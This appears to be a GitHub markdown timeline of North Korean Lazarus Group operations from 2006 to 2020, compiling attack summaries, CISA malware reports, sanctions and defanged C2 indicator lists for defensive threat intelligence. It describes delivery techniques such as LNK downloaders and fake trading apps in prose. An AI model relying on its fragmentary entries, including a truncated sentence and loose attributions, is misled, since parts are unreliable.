Skip to content

Latest commit

 

History

History
2406 lines (1473 loc) · 134 KB

lazarus-malware-and-ttps.md

File metadata and controls

2406 lines (1473 loc) · 134 KB
Raw

Lazarus Malware, TTPs, and Evolution

2006 - 2013

INTERPOL’s Supernote Summit wherein they decide to change the bill.

  • Date:: 2006-07-26
  • Reported to be manufactured in the North Korea, the Supernote is a high-quality counterfeit of the 50-dollar and 100-dollar note, also known as a Superdollar. The notes are produced using similar processes and materials as genuine US currency.
  • First detected back in 1989, over $50M have been found as of 2006.
  • https://govinfo.gov/content/pkg/CHRG-109shrg28241/pdf/CHRG-109shrg28241.pdf

Operation Flame Malware

  • Date:: 2007-07-03

MYDOOM Malware and Dozer Malware - DDoS Attacks

  • Date:: 2009-07-04
  • A large scale DDoS attack on US and South Korean websites uses the MYDOOM and Dozer malware, which is suspected to have arrived in email messages. The malware places the text “Memory of Independence Day” in the Master Boot Record (MBR).

Operation Troy DDoS Attacks

Ten Days of Rain Attacks

  • Date:: 2011-03
  • “Ten Days of Rain” attack targets South Korean media, financial, and critical infrastructure targets. Compromised computers within South Korea are used to launch DDoS attacks.

Nnghyuo Bank DDoS Attacks

  • Date:: 2011-04

DarkSeoul Wiper Attacks

  • Date:: 2013-03-20
  • DarkSeoul: a wiper attack that targeted three South Korean broadcast companies, financial institutes, and an ISP
  • At the time, two other groups going by the personas ″NewRomanic Cyber Army Team and WhoIs Team″, took credit for that attack

2014

Sony Pictures Hack Wiper Attack Occurs

  • Date:: 2014-11-24
  • Sony Pictures Entertainment (“SPE”) and its comedic film “The Interview,” which depicted a fictional Kim Jong-Un, the Chairman of the Workers’ Party of Korea and the “supreme leader” of North Korea
  • Lazarus targeted individuals and entities associated with the production of “The Interview” and employees of SPE, sending them malware that the subjects used to gain unauthorized access to Sony's network
  • Once inside Sony's network, the subjects stole movies and other confidential information, and then effectively rendered thousands of computers inoperable
  • The same group of subjects also targeted individuals associated with the release of “The Interview,” among other victims.
  • Perpetrators identified themselves as the Guardians of Peace.
  • Large amounts of data were stolen and slowly leaked in the days following the attack.
  • U.S. investigators say the culprits spent at least two months copying critical files
  • The attack was conducted using malware. Server Message Block Worm Tool to conduct attacks
  • Components of the attack included a listening implant, backdoor, proxy tool, destructive hard drive tool, and destructive target cleaning tool
  • The components clearly suggest an intent to gain repeated entry, extract information, and be destructive, as well as remove evidence of the attack
  • November 24, 2014 - malware previously installed rendered many Sony employees' computers inoperable by the software, with the warning by a group calling themselves the Guardians of Peace, along with a portion of the confidential data taken during the hack.
  • Several Sony-related Twitter accounts were also taken over
  • Park was a North Korean hacker that worked for the country's Reconnaissance General Bureau, the equivalent of the
  • The US DOJ also asserted that Park was partially responsible for arranging WannaCry, having developed part of the ransomware software
  • https://en.wikipedia.org/wiki/Sony_Pictures_hack
  • https://fbi.gov/news/pressrel/press-releases/update-on-sony-investigation

Operation Red Dot against South Korean Govt/Defence Co's

  • Date:: 2014-2015:
  • Variants of the malware used in the Sony Pictures hack were found in attacks which targeted the websites of North Korean research and governmental organizations, and the South Korean defence industry.
  • AhnLab refers to these attacks – which occurred from 2014 to 2015 – as Operation Red Dot. The variants in this operation share similar code and names, such as AdobeArm.exe and msnconf.exe.
  • The main infection methods are: executable files disguised as document files (HWP, PDF), disguised installers, and exploits of Hangul Word Processor (HWP) file vulnerabilities.
  • The document files, which are listed in Table 3, are decoys disguised as legitimate documents, such as address books, deposit slips and invitations to lure victims into opening them.
  • https://virusbulletin.com/virusbulletin/2018/11/vb2018-paper-hacking-sony-pictures/

2015

Banco del Austro in Ecuador SWIFT Bank Heist - $12M

KIMSUKY - South Korea blames North Korea for December hack on nuclear operator

Bangledesh Bank Employees spear-phished

  • Date:: 2015-03-30
  • By March the hackers had a backdoor to teh bank's electronic communication system allowing them to send messages to one another in a way that mimicked the bank’s encrypted-communication protocols, and did not alert security to their presence.

SWIFT Heists

  • 2015-2019
  • Attempts from 2015 through 2019 to steal more than $1.2 billion from banks in Vietnam, Bangladesh, Taiwan, Mexico, Malta, and Africa by hacking the banks’ computer networks and sending fraudulent SWIFT messages.

Sony Pictures Hack - Intrusion into Mammoth Screen, producer of a fictional series involving a British nuclear scientist taken prisoner in DPRK

2016

Sony Pictures Hack Report Released: Operation Blockbuster

Bangledesh Bank SWIFT Heist Initiated - $81M

Engaged in computer intrusions and cyber-heists at many financial services victims in the United States, and in other countries in Europe, Asia, Africa, North America, and South America in 2015, 2016, 2017, and 2018, with attempted losses well over $1 billion.

  • Date:: 2015-2018

BAE Systems Threat Research Blog: Cyber Heist Attribution

FASTCash - $16M dollars was withdrawn from roughly 1700 7-Eleven A.T.M.s across Japan using data stolen from South Africa’s Standard Bank

  • Date:: 2016-05-14

Tien Phong Bank in Vietnam SWIFT Heist - $1M

SWIFT Heists Symantec has found evidence that a bank in the Philippines has also been attacked by the group that stole US$81 million from the Bangladesh central bank

SWIFT Heists Evidence of Stronger Ties Between North Korea and SWIFT Banking Attacks

Operation Daybreak

Multiple spear-phishing campaigns targetting employees of US defense contractors, energy companies, aerospace companies, technology companies, the U.S.Department of State, and the U.S. Department of Defense

Stole more than 200GB of South Korean Army data

  • Date:: 2016
  • which included documents known as Operational Plan 5015—a detailed analysis of how a war with the country’s northern neighbor might proceed, and, notably, a plot to “decapitate” North Korea by assassinating Kim Jong Un. The breach was so egregious that Kim Tae-woo, a former president of the Korea Institute for National Unification, a think tank in Seoul, told the Financial Times, “Part of my mind hopes the South Korean military intentionally leaked the classified documents to the North with the intention of having a second strategy.”

2017

Lazarus Under The Hood

  • Date:: 2017-04-03
  • Lazarus is not just another APT actor. The scale of the Lazarus operations is shocking. It has been on a spike since 2011.
  • All those hundreds of samples that were collected give the impression that Lazarus is operating a factory of malware, which produces new samples via multiple independent conveyors.
  • We have seen them using various code obfuscation techniques, rewriting their own algorithms, applying commercial software protectors, and using their own and underground packers.
  • Lazarus knows the value of quality code, which is why we normally see rudimentary backdoors being pushed during the first stage of infection. Burning those doesn’t impact the group too much. However, if the first stage backdoor reports an interesting infection they start deploying more advanced code, carefully protecting it from accidental detection on disk. The code is wrapped into a DLL loader or stored in an encrypted container, or maybe hidden in a binary encrypted registry value. It usually comes with an installer that only attackers can use, because they password protect it. It guarantees that automated systems – be it a public sandbox or a researcher’s environment – will never see the real payload.
  • Most of the tools are designed to be disposable material that will be replaced with a new generation as soon as they are burnt. And then there will be newer, and newer, and newer versions. Lazarus avoids reusing the same tools, same code, and the same algorithms. “Keep morphing!” seems to be their internal motto.
  • Those rare cases when they are caught with same tools are operational mistakes, because the group seems to be so large that one part doesn’t always know what the other is doing.
  • https://securelist.com/lazarus-under-the-hood/77908/
  • https://csoonline.com/article/560979/kaspersky-lab-reveals-direct-link-between-banking-heist-hackers-and-north-korea.html

WannaCry

Lazarus Arisen

  • Date:: 2017-05-30
  • https://group-ib.com/blog/lazarus/
  • 210.52.109.22 - China Netcom, 210.52.109.0/24 is assigned to North Korea
  • 175.45.178.222 - Natinal Defence Commission
  • 175.45.178.19 - Ghost RAT
  • 175.45.178.97 - Ghost RAT

Four wallets on Yapizon, a South Korean cryptocurrency exchange, are compromised. (It is worth noting that at least some of the tactics, techniques, and procedures were reportedly employed during this compromise were different than those we have observed in following intrusion attempts and as of yet there are no clear indications of North Korean involvement).

  • Date:: 2017-04-22

The United States announces a strategy of increased economic sanctions against North Korea. Sanctions from the international community could be driving North Korean interest in cryptocurrency, as discussed earlier.

  • Date:: 2017-04-26

Spearphishing against South Korean Exchange #1 begins.

  • Date:: 2017-05-01

South Korean Exchange #2 compromised via spearphish.

  • Date:: 2017-05-30

More suspected North Korean activity targeting unknown victims, believed to be cryptocurrency service providers in South Korea.

  • Date:: 2017-06-01

CISA: Report on HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure

  • Date:: 2017-06-13
  • This Joint Technical Alert provides technical details on the tools and infrastructure used by cyber actors of the North Korean government to target the media, aerospace, financial, and critical infrastructure sectors in the United States and globally. Working with U.S. government partners, DHS and FBI identified Internet Protocol addresses associated with a malware variant, known as DeltaCharlie, used to manage North Korea’s DDoS botnet infrastructure.
  • https://us-cert.gov/ncas/alerts/TA17-164A

South Korean Exchange #3 targeted via spear phishing to personal account.

  • Date:: 2017-07-01

Why Is North Korea So Interested in Bitcoin?

Unit42 has discovered ongoing attack targeting individuals involved with US defense contracts links back to perportrators of the Sony Pictures Hack.

CISA's analysis of DeltaCharlie Attack Malware

  • Date:: 2017-08-23
  • STIX file for MAR 10132963. This MAR examines the functionality of the DeltaCharlie malware variant to manage North Korea’s distributed denial-of-service (DDOS) botnet infrastructure (refer to TA17-164A). DHS distributed this MAR to enable network defense and reduce exposure to any North Korean government malicious cyber activity.

The World Once Laughed at North Korean Cyberpower. No More.

CISA's analysis of FALLCHILL and Volgmer

  • Date:: 2017-11-14
  • CISA Alert TA17-318A: HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL
  • CISA Alert TA17-318B: HIDDEN COBRA – North Korean Trojan: Volgmer
  • These Joint Technical Alerts provide information and IOCs on malware variants used by the North Korean government to maintain a presence on victims’ networks and to further network exploitation. DHS and FBI distributed these alerts to enable network defense and reduce exposure to any North Korean government malicious cyber activity.

North Korea suspected in latest bitcoin heist, bankrupting Youbit exchange

CISA's analysis of North Korean Trojan: BANKSHOT

  • Date:: 2017-12-21
  • STIX file for MAR 10135536
  • DHS and FBI identified a Trojan malware variant—referred to as BANKSHOT—used by the North Korean government. This MAR analyzes three malicious executable files.
  • Two files are 32-bit Windows executables that function as Proxy servers and implement a Fake TLS method.
  • The third file is an Executable Linkable Format file designed to run on Android platforms as a fully functioning Remote Access Trojan.

2018

TrendMicro's KillDisk Variant Hits Latin American Financial Groups

Korea In The Crosshairs

North Korea Bitten by Bitcoin Bug: Financially motivated campaigns reveal new dimension of the Lazarus Group

  • Date:: 2018-01-29
  • https://proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug-180129.pdf
  • PowerRatankba, Gh0st RAT, RatankbaPOS
  • btc-gold[.]us
  • PowerRatankba C2:: 51.255.219[.]82
  • PowerRatankba C2:: 144.217.51[.]246
  • PowerRatankba C2:: 158.69.57[.]135
  • PowerRatankba C2:: 198.100.157[.]239
  • PowerRatankba C2:: 201.139.226[.]67
  • PowerRatankba C2:: 92.222.106[.]229
  • PowerRatankba C2:: apps.got-game[.]org
  • PowerRatankba C2:: trade.publicvm[.]com
  • PowerRatankba C2:: www.businesshop[.]net
  • PowerRatankba C2:: vietcasino.linkpc[.]net
  • C2:: coinbases[.]org
  • C2:: africawebcast[.]com
  • C2:: bitforex.linkpc[.]net
  • C2:: macintosh.linkpc[.]net
  • C2:: coinbroker.linkpc[.]net
  • C2:: moneymaker.publicvm[.]com

North Korea stole huge amount of virtual currency: South Korea spy agency

CISA's analysis of North Korean Trojan: HARDRAIN

  • Date:: 2018-02-13
  • AR 10135536-F: North Korean Trojan: HARDRAIN
  • STIX file for MAR 10135536-F
  • DHS and FBI identified a Trojan malware variant—referred to as HARDRAIN—used by the North Korean government.

Reaper - The Overlooked North Korean Actor from FireEye

CISA's analysis of North Korean Trojan: SHARPKNOT

  • Date:: 2018-03-28
  • MAR 10135536.11: North Korean Trojan: SHARPKNOT
  • STIX file for MAR 10135536.11
  • DHS and FBI identified a Trojan malware variant—referred to as SHARPKNOT—used by the North Korean government. SHARPKNOT is a 32-bit Windows executable file. When executed from the command line, the malware overwrites the Master Boot Record and deletes files on the local system, any mapped network shares, and physically connected storage devices.

Lazarus KillDisks Central American casino

  • Date:: 2018-04-03
  • https://welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/
  • Our analysis shows that the cybercriminals behind the attack against an online casino in Central America, and several other targets in late-2017, were most likely the infamous Lazarus hacking group. In all of these incidents the attackers utilized similar toolsets, including KillDisk; the disk-wiping tool that was executed on compromised machines.
  • Some of the past attacks attributed to the Lazarus Group attracted the interest of security researchers who relied on Novetta et al’s white papers with hundreds of pages describing the tools used in the attacks – the Polish and Mexican banks; the WannaCryptor outbreak; phishing campaigns against US defense contractors, etc – and provides grounds for the attribution of these attacks to the Lazarus Group.
  • Our analysis of these two Win32/KillDisk.NBO variants revealed that they share many code similarities. Further, they are almost identical to the KillDisk variant used against financial organizations in Latin America, as described by Trend Micro.
  • One of the variants was protected using the commercial PE protector VMProtect in its 3rd generation, which made unpacking it trickier. The attackers most likely did not buy a VMProtect license but have rather used leaked or pirated copies available on the Internet. Using protectors is common for the Lazarus group: during the Polish and Mexican attacks in February 2017, they made use of Enigma Protector and some of the Operation Blockbuster samples, reported by Palo Alto Networks, used an older version of VMProtect.
  • This recent attack against an online casino in Central America suggests that hacking tools from the Lazarus toolset are recompiled with every attack (we didn’t see these exact samples anywhere else). The attack itself was very complex, consisted of several steps, and involved tens of protected tools that, being stand-alone, would reveal little from their dynamics.
  • Utilizing KillDisk in the attack scenario most likely served one of two purposes: the attackers covering their tracks after an espionage operation, or it was used directly for extortion or cyber-sabotage. In any case, the fact that ESET products detected the malware on over 100 endpoints and servers in the organization signifies a large-scale effort of the attackers.

SWIFT is aware of a malware that aims to reduce financial institutions’ abilities to evidence fraudulent transactions on their local systems. Contrary to reports that suggest otherwise, this malware has no impact on SWIFT’s network or core messaging services.

CISA's analysis of HIDDEN COBRA – Joanap Backdoor Trojan and Brambul Server Message Block Worm

  • Date:: 2018-05-29
  • CISA Alert TA18-149A: HIDDEN COBRA – Joanap Backdoor Trojan and Brambul Server Message Block Worm
  • MAR 10135536-3: HIDDEN COBRA RAT/Worm
  • This Joint Technical Alert and MAR authored by DHS and FBI provides information, including IOCs associated with two families of malware used by the North Korean government: A remote access tool, commonly known as Joanap; and Server Message Block worm, commonly known as Brambul.

NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea

Banco de Chile Wiper Attack Just a Cover for $10M SWIFT Heist

CISA's analysis of North Korean Trojan: TYPEFRAME

  • Date:: 2018-06-14
  • AR 10135536-12
  • DHS and FBI identified a Trojan malware variant—referred to as TYPEFRAME—used by the North Korean government. DHS and FBI distributed this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity. This malware report contains an analysis of multiple malware samples consisting of 32-bit and 64-bit Windows executable files and a malicious Microsoft Word document that contains Visual Basic for Applications macros.

New Andariel Reconnaissance Tactics Uncovered

  • Date:: 2018-07-16
  • https://trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html
  • Andariel has been quite active these past few months. According to South Korean security researchers IssueMakersLab, the group used an ActiveX zero-day exploit for watering hole attacks on South Korean websites last May—they called this “Operation GoldenAxe”. But more recently on June 21, we noticed that Andariel injected their script into four other compromised South Korean websites for reconnaissance purposes.

CISA's analysis of North Korean Trojan: KEYMARBLE

  • Date:: 2018-08-09
  • AR 10135536-17
  • DHS and FBI identified a Trojan malware variant—referred to as KEYMARBLE—used by the North Korean government. KEYMARBLE is a RAT capable of accessing device configuration data, downloading additional files, executing commands, modifying the registry, capturing screen shots, and exfiltrating data.

DOJ’s Criminal Complaint of a North Korean Regime-Backed Programmer Jin Hyok Park

The most destructive cyber threat right now

FireEye: Report on APT38

NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT

CISA's analysis of HIDDEN COBRA FASTCash Campaign

Mandiant: APT38 - Details on New North Korean Regime-Backed Threat Group

Recorded Future: Lazarus Group Shifting Patterns in Internet Use Reveal Adaptable and Innovative North Korean Ruling Elite

Cryptocurrency businesses targeted by Lazarus via custom PowerShell Scripts

KIMSUKY - Stolen Pencil Campaign

Top secret report: North Korea keeps busting sanctions, evading U.S.-led sea patrols

Group-IB: 2018 Crime Report

According to the Treasury, NK affiliated hackers “likely” stole ~$571 million in cryptocurrency from five Asian exchanges in 2017 and 2018.

  • 2018-09: Indonesian Crypto Company Theft - $24.9M
  • 2018-06: Bithumb2 CEX Hack - Lazarus - $30M
  • 2017-12: YouBit CEX Hack (previously known as Yapizon)
  • 2017-04: Yapizon CEX Hack - 3831 BTC

Multiple malicious cryptocurrency applications which would provide the North Korean hackers a backdoor into the victims’ computers.

  • Date:: March 2018 through at least September 2020
  • Celas Trade Pro WorldBit-Bot iCryptoFx Union Crypto Trader Kupay Wallet CoinGo Trade Dorusio CryptoNeuro Trader and Ants2Whale
  • which would provide the North Korean hackers a backdoor into the victims’ computers.

FASTCash grabs $6.1 million from BankIslami Pakistan Limited

Operation AppleJeus research highlighted Lazarus’s focus on cryptocurrency exchanges utilizing a fake company with a backdoored product aimed at cryptocurrency businesses

  • Date:: 2018
  • New ability to target macOS.
  • Infected with malware after installing a legitimate-looking trading application called Celas Trade Pro from Celas Limited showed no signs of malicious behaviour and looked genuine. Malware delivered via update files in app. User installed this program via a download link delivered over email.
  • For macOS users, Celas LLC also provided a native version of its trading app. A hidden “autoupdater” module is installed in the background to start immediately after installation, and after each system reboot.
  • https://securelist.com/operation-applejeus/87553/

2019

Two Hundred North Korean hacker organizations dispatched overseas, each team sending up to $1 million to North Korea

KIMSUKY - Operation Kabar Cobra

KIMSUKY - Operation Smoke Screen

North Korea's Next Weapon of Choice: Cyber

ScarCruft continues to evolve, introduces Bluetooth harvester

JPCERT: Spear Phishing against Cryptocurrency Businesses

  • Date:: 2019-07-09
  • https://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html
  • The zip file downloaded from the URL in the email contains a password-protected decoy document and a shortcut file “Password.txt.lnk”. This shortcut file contains some commands, and they run when the file is executed. The below image illustrates the flow of events from the shortcut file being executed until the VBScript-based downloader is launched.
  • CryptoCore
  • C2:: service.amzonnews[.]club
  • C2:: 75.133.9[.]84
  • C2:: update.gdrives[.]top
  • C2:: googledrive[.]network
  • C2:: drverify.dns-cloud[.]net
  • C2:: docs.googlefiledrive[.]com
  • C2:: europasec.dnsabr[.]com
  • C2:: eu.euprotect[.]net
  • C2:: 092jb_378v3_1.googldocs[.]org
  • C2:: gbackup.gogleshare[.]xyz
  • C2:: drive.gogleshare[.]xyz
  • C2:: down.financialmarketing[.]live
  • C2:: drivegoogle.publicvm[.]com
  • C2:: googledrive.publicvm[.]com
  • C2:: mskpupdate.publicvm[.]com
  • C2:: googledrive[.]email
  • C2:: iellsfileshare.sharedrivegght[.]xyz
  • C2:: download.showprice[.]xyz
  • C2:: downs.showprice[.]xyz
  • C2:: mdown.showprice[.]xyz
  • C2:: start.showprice[.]xyz
  • C2:: u13580130.ct.sendgrid[.]net

CISA's analysis of North Korean Malware ELECTRICFISH and BADCALL

  • Date:: 2019-09-09
  • MAR 10135536-21: North Korean Proxy Malware: ELECTRICFISH Note: this version of the ELECTRICFISH MAR updates the May 9, 2019 version.
  • MAR 10135536-10: North Korean Trojan: BADCALL Note: this version of the BADCALL MAR updates the February 6, 2018 version: and STIX file.
  • CISA, FBI, and DoD identified multiple malware variants used by the North Korean government.
  • ELECTRICFISH implements a custom protocol that allows traffic to be tunneled between a source and a destination Internet Protocol (IP) address.
  • BADCALL malware is an executable that functions as a proxy server and implements a Fake TLS method.

Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups

Indian Nuclear Power Plant Attack

  • Date:: 2019-10-29
  • https://greatgameindia.com/kudankulam-nuclear-power-plant-hit-by-cyberattack/
  • Kaspersky Global Research and Analysis Team have discovered a previously unknown spy tool, which had been spotted in Indian financial institutions and research centers. Called Dtrack, this spyware reportedly was created by the Lazarus group and is being used to upload and download files to victims’ systems, record key strokes and conduct other actions typical of a malicious remote administration tool (RAT).
  • In 2018, Kaspersky researchers discovered ATMDtrack – malware created to infiltrate Indian ATMs and steal customer card data. Following further investigation using the Kaspersky Attribution Engine and other tools, the researchers found more than 180 new malware samples that had code sequence similarities with the ATMDtrack, but at the same time were not aimed at ATMs. Instead, its list of functions defined it as spy tools, now known as Dtrack.
  • Moreover, not only did the two strains share similarities with each other, but also with the 2013 DarkSeoul campaign, which was attributed to Lazarus – an infamous advanced persistence threat actor responsible for multiple cyberespionage and cyber sabotage operations.

Indian Nuclear Power Plant Attack We have long known and continuously monitored North Korea is attacking India

New Lazarus Malware: macOS Threat Served from Cryptocurrency Trading Platform

2020

CISA's analysis of North Korean Trojans BISTROMATH, SLICKSHOES, CROWDEDFLOUNDER, HOTCROISSANT, ARTFULPIE, BUFFETLINE, HOPLIGHT

  • Date:: 2020-02-14
  • Note: this version of HOPLIGHT MAR updates the October 31, 2019 version, which updated April 10, 2019 version.
  • BISTROMATH looks at multiple versions of a full-featured Remote Access Trojan implant executable and multiple versions of the CAgent11 GUI implant controller/builder.
  • SLICKSHOES is a Themida-packed dropper that decodes and drops a Themida-packed beaconing implant.
  • CROWDEDFLOUNDER looks at Themida packed Windows executable.
  • HOTCROSSIANT is a full-featured beaconing implant.
  • ARTFULPIE is an implant that performs downloading and in-memory loading and execution of a DLL from a hardcoded URL.
  • BUFFETLINE is a full-featured beaconing implant.
  • HOPLIGHT looks at multiple malicious executable files. Some of which are proxy applications that mask traffic between the malware and the remote operators.

Treasury Sanctions Individuals Laundering Cryptocurrency for Lazarus Group

How an elaborate North Korean crypto hacking heist fell apart

UNC2891 Have Your Cake and Eat it Too? An Overview of UNC2891

  • Date:: 2020-03-16
  • https://mandiant.com/resources/unc2891-overview
  • UNC2891 intrusions appear to be financially motivated and in some cases spanned several years through which the actor had remained largely undetected.
  • Mandiant discovered a previously unknown rootkit for Oracle Solaris systems that UNC2891 used to remain hidden in victim networks, we have named this CAKETAP.
  • Mandiant expects that UNC2891 will continue to capitalize on this and perform similar operations for financial gain that target mission critical systems running these operating systems.

U.S. Government Advisory: Guidance on the North Korean Cyber Threat

  • Date:: 2020-04-15
  • The U.S. Departments of State, Treasury, and Homeland Security and FBI issued this Advisory as a comprehensive resource on the North Korean cyber threat for the international community, network defenders, and the public. The Advisory highlights the cyber threat posed by North Korea and provides recommended steps to mitigate the threat.

CISA's Guidance on the North Korean Cyber Threat

CISA Alert on TraitorTrader

OXT's The North Korean Connection

CISA's analysis of North Korean Trojans: COPPERHEDGE, TAINTEDSCRIBE, PEBBLEDASH

  • Date:: 2020-05-12
  • MAR 1028834-1.v1: North Korean Remote Access Tool: COPPERHEDGE
  • MAR 1028834-2.v1: North Korean Trojan: TAINTEDSCRIBE
  • MAR 1028834-3.v1: North Korean Trojan: PEBBLEDASH
  • CISA, FBI, and DoD identified three malware variants used by the North Korean government.
  • COPPERHEDGE is Manuscrypt family of malware is used by APT cyber actors in the targeting of cryptocurrency exchanges and related entities. Manuscrypt is a
  • TAINTEDSCRIBE and PEBBLEDASH are full-featured beaconing implants.

U.S. Government Advisory: Top 10 Routinely Exploited Vulnerabilities

  • Date:: 2020-05-12
  • CISA, FBI, and the broader U.S. Government authored a Joint Alert with details on vulnerabilities routinely exploited by foreign cyber actors, including North Korean cyber actors.

USA Chargees 28 North Koreans and 5 Chinese citizens with laundering more than $2.5 billion in assets to help fund North Korea’s nuclear weapons

ClearSky: CryptoCore - A Threat Actor Targeting Cryptocurrency Exchanges

  • Date:: 2020-06-01
  • https://clearskysec.com/wp-content/uploads/2020/06/CryptoCore_Group.pdf
  • CryptoCore, Dangerous Password, Leery Turtle
  • The group often uses Google Drive as the storage for its files, specifically the bait
  • Relatively heavy use of VBS files both as downloaders and as backdoors. What appears to be the main backdoor of the group is also a VBS file (tracked by Proofpoint Emerging Threats as CageyChameleon), rather than an executable or an in-memory payload.
  • LNK shortcuts as downloaders – we have seen the attackers hide LNK shortcuts behind icons and titles of other file types, mostly text files. Sometimes it could be a password file needed to open the main document, sometimes it could be the main document that is actually a shortcut, but LNK files are a staple for this group. These files are used to connect to the command and control (C2) server and download next-stage files.
  • .xyz TLD via NameCheap
  • The VBS created in %TEMP% acts as a downloader for another VBS. That VBS collects: Username, Host name, OS version, install date and run time, Time zone, CPU name, Execution path of the VBS in %TEMP%, Network adapter information, List of running processes. The information is sent to the C2 server every minute, and it expects additional VBS as a response.

VHD ransomware, Hakuna MATA

  • Date:: 2020-07-01
  • initial access was achieved through opportunistic exploitation of a vulnerable VPN gateway. After that, the attackers obtained administrative privileges, deployed a backdoor on the compromised system and were able to take over the Active Directory server.
  • https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/

North Korean hackers are skimming US and European shoppers

U.S. seeks forfeiture of $2,372,793 for violations of sanctions against the DPRK

  • Date:: 2020-07-23
  • According to the complaint, the four companies laundered U.S. dollars on behalf of sanctioned North Korean banks and helped those banks to illegally access the U.S. financial market.
  • The complaint lists one source of the laundered funds as a DPRK entitity involved in the banned sales of North Korean coal. The laundered funds were used to purchase Russian pretroleum products and nuclear and missile components for the DPRK and to aid multiple cover branches of the DPRK’s Foreign Trade bank, which the U.S. Treasury Department had sanctioned for “facilitating transactions on behalf of actors linked to the DPRK’s proliferation network”.
  • https://justice.gov/opa/pr/united-states-files-complaint-forfeit-more-237-million-companies-accused-laundering-funds

Yang Ban Corporation Pleads Guilty to Money Laundering

  • Date:: 2020-08-31
  • From at least February 2017 to May 2018 and beyond, Yang Ban deceived banks in the U.S. into processing transactions for North Korean customers of Yang Ban.
  • It used front companies and created false sets of invoices and shipping records to conceal that the ultimate destination of shipments were customers in the DPRK. These practices helped Yang Ban circumvent “banks’ sanction and anti-money laundering filters” thus “duping U.S. correspondent banks into processing U.S. dollar transactions that they would not otherwise have authorized.”
  • Yang Ban specifically admitted to conspiring with SINSMS (a company subsequently designated by U.S. sanctions) and others, “to conceal the North Korean nexus” by falsifying shipping records and by other means.
  • The company will pay a financial penalty totaling $673,714 (USD) and has “agreed to implement rigorous internal controls and to cooperate fully with the Justice Department, including by reporting any criminal conduct by an employee”.
  • https://justice.gov/opa/pr/company-pleads-guilty-money-laundering-violation-part-scheme-circumvent-north-korean
  • https://nknews.org/2020/09/company-pleads-guilty-to-helping-north-korea-illegally-use-us-banking-system

Operation Dream Job - Espionage Campaign Targetting Govt and Defense Co's

  • Date:: 2020-08-13
  • Widespread North Korean Espionage Campaign
  • It succeeded in infecting several dozens of companies and organizations in Israel and globally
  • Main targets: defense, governmental companies, and specific employees of those companies
  • We assess this to be this year’s main offensive campaign by the Lazarus group
  • The infection and infiltration of target systems had been carried out through a widespread and sophisticated social engineering campaign, which included: reconnaissance, creation of fictitious LinkedIn profiles, sending emails to the targets’ personal addresses, and conducting a continuous dialogue with the target – directly on the phone, and over WhatsApp
  • Upon infection, the attackers collected intelligence regarding the company’s activity, and also its financial affairs, probably in order to try and steal some money from it
  • The double scenario of espionage and money theft is unique to North Korea, which operates intelligence units that steal both information and money for their country.
  • https://clearskysec.com/operation-dream-job/
  • https://clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf

CISA's analysis of North Korean Remote Access Trojan: BLINDINGCAN

  • Date:: 2020-08-19
  • CISA and FBI have identified a malware variant—referred to as BLINDINGCAN—used by North Korean actors. FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation. A threat group with a nexus to North Korea targeted government contractors early this year to gather intelligence surrounding key military and energy technologies.

DPRK-aligned threat actor targeting cryptocurrency vertical with global hacking campaign

Lazarus Group Campaign Targeting the Cryptocurrency Vertical

CISA: Report FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks

  • Date:: 2020-08-26
  • MAR 10301706-1.v1: North Korean Remote Access Tool: ECCENTRICBANDWAGON
  • MAR 10301706-2.v1: North Korean Remote Access Tool: VIVACIOUSGIFT
  • MAR 10257062-1.v2: North Korean Remote Access Tool: FASTCASH for Windows
  • CISA, the Department of the Treasury, FBI, and U.S. Cyber Command released a joint Technical Alert and three MARs on the North Korean government’s ATM cash-out scheme—referred to by the U.S. Government as “FASTCash.”
  • https://cisa.gov/news-events/cybersecurity-advisories/aa20-239a

US DOJ: Forfeiture Complaint for 280 Crypto addresses tied to North Korea

Chainalysis: report regarding Lazarus Group on-chain activity and the recent US DOJ civil forfeiture of 280 cryptocurrency addresses

F-Secure: Report on Lazarus Group's targeting of crypto companies

US DOJ: Lazarus Group developed multiple malicious crypto applications from March 2018 through at least September 2020. Such apps include Celas Trade Pro, Worldbit-bot, icryptofx, Union Crypto Trader, Kupay Wallet, Coingo Trade, Dorusio, Cryptoneuro Trader, and Ants2whale.

  • Date:: 2020-09-20

Secret documents show how North Korea launders money through U.S. banks

Phrma Company Espionage Attacks

  • Date:: 2020-09
  • An employee of the pharmaceutical company received a document named GD2020090939393903.doc with a job offer (creation date: 2020:09:22 03:08:00).
  • After a short period of time, another employee received a document named GD20200909GAB31.doc with a job offer from the same company (creation date: 2020:09:14 07:50:00). By opening the documents from a potential employer, both victims activated malicious macros on their home computers
  • In one of the cases, a malicious document was received via Telegram. Note that both documents were received by the victims over the weekend.
  • At the same time, by performing reconnaissance on the computers available, the attackers received new vectors for penetration into the company's corporate network. So, two days later, after the company's network infrastructure was compromised, another employee from another branch received a job offer. On the social network LinkedIn, the victim was contacted by a user named Rob Wilson, shortly after which she received an email with a job offer from General Dynamics UK.
  • The compromised user also forwarded the malicious email to her colleague. However, the recipient did not open the malicious document and did not allow the attackers to expand the attack surface.
  • In this campaign, attackers, under the guise of the HR service of General Dynamics Mission Systems, sent documents with malicious macros containing a stub text with a job offer through LinkedIn Messages, Telegram, WhatsApp, and corporate email.

NTT Security: Unveiling The Cryptomimic

CISA: Report on North Korean Advanced Persistent Threat Focus: Kimsuky

  • Date:: 2020-10-27
  • CISA, FBI, and the U.S. Cyber Command Cyber National Mission Force (CNMF) released a new Joint Cybersecurity Advisory on TTPs used by North Korean APT group Kimsuky.

North Korean hackers targeted COVID vaccine maker AstraZeneca

OFAC Cyber-related Designations

Pharma Company Espionage Attacks

  • Date:: 2020
  • Stayed in their systems for months on end
  • Contacted in Feb 2020
  • Payload delivered in Q2/Q3
  • Data exif Q2 Q3 Q4 2020
